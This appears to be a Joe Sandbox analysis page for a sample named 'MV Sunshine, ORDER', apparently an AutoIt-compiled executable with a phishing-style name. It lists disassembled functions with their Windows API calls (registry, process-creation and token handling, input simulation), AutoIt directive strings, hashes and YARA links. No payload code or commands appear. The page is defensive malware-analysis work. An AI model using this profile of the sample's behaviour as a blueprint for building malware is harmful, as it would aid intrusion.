Opcode ID: 8298b514a6ae1ba5362f9cbcbcd452ff07620ee118e52b5f1d28ccbbc6abdd9e
Instruction ID: 0da69afa8471604c12679bd39bbb87ec7c3527eac15b5f3ff5d70d792825a7c9
Opcode Fuzzy Hash: 8298b514a6ae1ba5362f9cbcbcd452ff07620ee118e52b5f1d28ccbbc6abdd9e
Instruction Fuzzy Hash: DB214135644208AFDB20FFA8DC88DAB77ECEB09760B10C126F915DB660DA75DC46CB64

Function 009DFB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 009DFB81
__wcsnicmp.LIBCMT ref: 009DFBA2
__wcsnicmp.LIBCMT ref: 009DFBBC

Strings

#notrayicon, xrefs: 009DFB79
#OnAutoItStartRegister, xrefs: 009DFBB6
#requireadmin, xrefs: 009DFB9C

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 87b9a5bca32aebc55f003b82abad828dca25f6bbba091c9434e362485f8947d9
Instruction ID: dfe7e4a835e84d7343d073d3786980d3557e84ac192a29ae939a368e08f04b1d
Opcode Fuzzy Hash: 87b9a5bca32aebc55f003b82abad828dca25f6bbba091c9434e362485f8947d9
Instruction Fuzzy Hash: 9821283219415566D220AA34DC23FB7B39CEF92350F14C437F8CB86281EB5999919391

Function 00A0783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00981D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00981D73
Part of subcall function 00981D35: GetStockObject.GDI32(00000011), ref: 00981D87
Part of subcall function 00981D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00981D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A078A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A078AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A078B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A078C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A078D4

Strings

Msctls_Progress32, xrefs: 00A07872

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: bcd17cc8df856782985956034bb44bd49ac01387bf35f80cbe867ce3068f7811
Instruction ID: 22f3e25377bfb065fd2ca4b6aef4032dfd59aa0be31a8aaaf6100b792bc28afb
Opcode Fuzzy Hash: bcd17cc8df856782985956034bb44bd49ac01387bf35f80cbe867ce3068f7811
Instruction Fuzzy Hash: 72118EB251021DBEEF159F60CC85EEB7F6DEF48758F018114BA04A20A0C772AC62DBA0

Function 009A41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,009A4292,?), ref: 009A41E3
GetProcAddress.KERNEL32(00000000), ref: 009A41EA
EncodePointer.KERNEL32(00000000), ref: 009A41F6
DecodePointer.KERNEL32(00000001,009A4292,?), ref: 009A4213

Strings

combase.dll, xrefs: 009A41DE
RoInitialize, xrefs: 009A41D2

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: c701187232ed27c80c278512ae206828b894117c42e3ee30b3bef0c33f668d88
Instruction ID: 63d87901f245695425c3bac28cb2426963b7b5183db4696028371daff35c9f4d
Opcode Fuzzy Hash: c701187232ed27c80c278512ae206828b894117c42e3ee30b3bef0c33f668d88
Instruction Fuzzy Hash: 06E012F8590744AEEB20DBF4EC49B443594B7AA706F104524B521E54E0D7B654D38F00

Function 009A429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009A41B8), ref: 009A42B8
GetProcAddress.KERNEL32(00000000), ref: 009A42BF
EncodePointer.KERNEL32(00000000), ref: 009A42CA
DecodePointer.KERNEL32(009A41B8), ref: 009A42E5

Strings

combase.dll, xrefs: 009A42B3
RoUninitialize, xrefs: 009A42A7

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 201d8bb154c644c108438e2194d82355de1b433515401364dd1c3c827e8707bc
Instruction ID: d089d9d08597706309444c31b80436a8fb02579efc5a9b477c2f1cd91944c256
Opcode Fuzzy Hash: 201d8bb154c644c108438e2194d82355de1b433515401364dd1c3c827e8707bc
Instruction Fuzzy Hash: B8E0BF7C541304AFEB60DBE4FC0EB443AA4B759746F204525F511F54A0CBB58593CB15

Function 009E675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009E68AD
_memmove.LIBCMT ref: 009E67E8

Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C

_memmove.LIBCMT ref: 009E685B
_memmove.LIBCMT ref: 009E6942
_memmove.LIBCMT ref: 009E695B
_memmove.LIBCMT ref: 009E6977

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: ecd8279f8e72c8688cf3691b7744d89f1efaaf694fdcfa3f8cbe5a350d748cde
Instruction ID: 6711fac0055f28292519b18dbc72e174a2d0f8a6ba718b5197835c6a46df6e6f
Opcode Fuzzy Hash: ecd8279f8e72c8688cf3691b7744d89f1efaaf694fdcfa3f8cbe5a350d748cde
Instruction Fuzzy Hash: F861CE3050029A9BCF12FF65CC82FFE77A8AF95348F084519F8595B292DB35AD41CB90

Function 00A0046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82

Part of subcall function 00A010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A00038,?,?), ref: 00A010BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A00548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A00588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00A005AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A005D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A00617
RegCloseKey.ADVAPI32(00000000), ref: 00A00624

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: ca94d20fd71feebd97337668ec36992d868ce4edf2b5b71eb2a539cb159fa3c6
Instruction ID: 884db303a5bf59dbf896225fab94fbfd5bc33afba57e2c13241c6e375f43d697
Opcode Fuzzy Hash: ca94d20fd71feebd97337668ec36992d868ce4edf2b5b71eb2a539cb159fa3c6
Instruction Fuzzy Hash: AC515631208204AFCB14EF64D885F6EBBE9FF89314F04892DF585972A2DB71E905CB52

Function 00A05A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00A05A82
GetMenuItemCount.USER32(00000000), ref: 00A05AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A05AE1
GetMenuItemID.USER32(?,?), ref: 00A05B50
GetSubMenu.USER32(?,?), ref: 00A05B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 00A05BAF

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 4682cd1d78b8c81efe159fc93b82949c5c45d9c275f0a3e6ed1607d66966f044
Instruction ID: 3d51f81a078a7348653a6f4a71882c05962f3ac792e33ef8f89cf2540860aa04
Opcode Fuzzy Hash: 4682cd1d78b8c81efe159fc93b82949c5c45d9c275f0a3e6ed1607d66966f044
Instruction Fuzzy Hash: 55517F35E00619AFCB15EFA4D885AAEB7B4EF49310F144469E812B7391DB71BE41CF90

Function 009DF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009DF3F7
VariantClear.OLEAUT32(00000013), ref: 009DF469
VariantClear.OLEAUT32(00000000), ref: 009DF4C4
_memmove.LIBCMT ref: 009DF4EE
VariantClear.OLEAUT32(?), ref: 009DF53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009DF569

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 1fe7bd21118abafe8e418c1fed17c78183ed32ea87b85eb668c124be21c3b932
Instruction ID: e34e75afccaf16e220a273a3d3606d6c1a2a9f343b8469d5cfdc2155cf088395
Opcode Fuzzy Hash: 1fe7bd21118abafe8e418c1fed17c78183ed32ea87b85eb668c124be21c3b932
Instruction Fuzzy Hash: E6515AB5A00209AFCB10CF58D894AAAB7F8FF4C354B15856AFD59DB311D730E912CBA0

Function 009E26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009E2747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E2792
IsMenu.USER32(00000000), ref: 009E27B2
CreatePopupMenu.USER32 ref: 009E27E6
GetMenuItemCount.USER32(000000FF), ref: 009E2844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 009E2875

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: dc60ef44725a98371d8834162b793a4399da02ac726c5eb1505145b7982e2c18
Instruction ID: 5dad682262d79b5e7e0b63b929c51f67a2e6a343462750aeef164ef4d4184cf0
Opcode Fuzzy Hash: dc60ef44725a98371d8834162b793a4399da02ac726c5eb1505145b7982e2c18
Instruction Fuzzy Hash: 4B518D70A00289EFDF26CF6AC888BAEBBFCBF44314F104569E415AB291D7709D45CB51

Function 00981765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0098179A
GetWindowRect.USER32(?,?), ref: 009817FE
ScreenToClient.USER32(?,?), ref: 0098181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0098182C
EndPaint.USER32(?,?), ref: 00981876

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 7d45e2e28359315388ebcea685ef7964115fb0b459eb89d06b28ee4a4aba0091
Instruction ID: 6bd6dbef65b2d9d4271d20c5e03f4fa914eb2eb0e752e2e440066d48cf2c83a6
Opcode Fuzzy Hash: 7d45e2e28359315388ebcea685ef7964115fb0b459eb89d06b28ee4a4aba0091
Instruction Fuzzy Hash: 41419F75504304AFD720EF64CC85FBA7BECEB8A724F140629F994872A1C7719847DB62

Function 00A0B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00A467B0,00000000,015B92B0,?,?,00A467B0,?,00A0B862,?,?), ref: 00A0B9CC
EnableWindow.USER32(00000000,00000000), ref: 00A0B9F0
ShowWindow.USER32(00A467B0,00000000,015B92B0,?,?,00A467B0,?,00A0B862,?,?), ref: 00A0BA50
ShowWindow.USER32(00000000,00000004,?,00A0B862,?,?), ref: 00A0BA62
EnableWindow.USER32(00000000,00000001), ref: 00A0BA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00A0BAA9

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 1d2d2dfa055e39aecba2cb29ecb01d63011c29b65900b5be4d55b8d7a1714e23
Instruction ID: 2ba390705f79c03a2d6054ffc2b573f7c03941d0439ba23fd4558a842c52d299
Opcode Fuzzy Hash: 1d2d2dfa055e39aecba2cb29ecb01d63011c29b65900b5be4d55b8d7a1714e23
Instruction Fuzzy Hash: CA416530610249AFDB22CF54DA89B957BE0FF05350F1841B9FA489F6E2C731A856CB71

Function 009F73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,009F5134,?,?,00000000,00000001), ref: 009F73BF

Part of subcall function 009F3C94: GetWindowRect.USER32(?,?), ref: 009F3CA7

GetDesktopWindow.USER32 ref: 009F73E9
GetWindowRect.USER32(00000000), ref: 009F73F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 009F7422

Part of subcall function 009E54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E555E

GetCursorPos.USER32(?), ref: 009F744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009F74AC

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 1f813292b4ab5046690908a1bed014379a6f722983a55c69f855c809e3faadd5
Instruction ID: 29a779762056578578123994c6351f7958fa646b04fb95f4bbb88538228cae91
Opcode Fuzzy Hash: 1f813292b4ab5046690908a1bed014379a6f722983a55c69f855c809e3faadd5
Instruction Fuzzy Hash: 7D31B672509349AFD720DF54DC49F5BBB9AFF88314F004919F585A7191DA30E906CB92

Function 009D8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009D8608
Part of subcall function 009D85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009D8612
Part of subcall function 009D85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009D8621
Part of subcall function 009D85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009D8628
Part of subcall function 009D85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009D863E

GetLengthSid.ADVAPI32(?,00000000,009D8977), ref: 009D8DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 009D8DB8
HeapAlloc.KERNEL32(00000000), ref: 009D8DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 009D8DD8
GetProcessHeap.KERNEL32(00000000,00000000,009D8977), ref: 009D8DEC
HeapFree.KERNEL32(00000000), ref: 009D8DF3

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 70b4fd491f1f3de6c15f82f6c239726936bb2835c0f0ff83c1872c491e4557ff
Instruction ID: 062687e90472bd4a5a45394241c64b064e9946557dd90ba6b6c51090c9c88e63
Opcode Fuzzy Hash: 70b4fd491f1f3de6c15f82f6c239726936bb2835c0f0ff83c1872c491e4557ff
Instruction Fuzzy Hash: 8611CD31540609FFDB20DFA4CC48BAF777EEB54315F10812AE885A36D1DB319902CB60

Function 009D8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009D8B2A
OpenProcessToken.ADVAPI32(00000000), ref: 009D8B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009D8B40
CloseHandle.KERNEL32(00000004), ref: 009D8B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009D8B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 009D8B8E

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: d8b3ea5eb5b0fd318c3c5a1040314609996bcc933fdc71612b1342dad169b1ed
Instruction ID: ec38f5719dbf6f9d33786cd5bf8a21ab2dbe7b12db9e89e1d4b9396fa6337773
Opcode Fuzzy Hash: d8b3ea5eb5b0fd318c3c5a1040314609996bcc933fdc71612b1342dad169b1ed
Instruction Fuzzy Hash: 65114AB254020DAFDB11CFA4DD49FDA7BADEB08704F048066FE04A2161C6759D629B61

Function 00A0C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 009812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0098134D
Part of subcall function 009812F3: SelectObject.GDI32(?,00000000), ref: 0098135C
Part of subcall function 009812F3: BeginPath.GDI32(?), ref: 00981373
Part of subcall function 009812F3: SelectObject.GDI32(?,00000000), ref: 0098139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00A0C1C4
LineTo.GDI32(00000000,00000003,?), ref: 00A0C1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00A0C1E6
LineTo.GDI32(00000000,00000000,?), ref: 00A0C1F6
EndPath.GDI32(00000000), ref: 00A0C206
StrokePath.GDI32(00000000), ref: 00A0C216

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 35ded4c0eb88f4996977c77afd098bd866b2685a3169540894308e44ad4da331
Instruction ID: a258ab04aacfcbdc03a64f105634eddc8a37566894aba1b9a5afbdd514e6b4bb
Opcode Fuzzy Hash: 35ded4c0eb88f4996977c77afd098bd866b2685a3169540894308e44ad4da331
Instruction Fuzzy Hash: 0111097644010CBFDB11DF90DC88FEA7FADEB09364F048121BA185A5A1D7729D56DBA0

Function 009A03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 009A03D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 009A03DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 009A03E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 009A03F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 009A03F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 009A0401

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
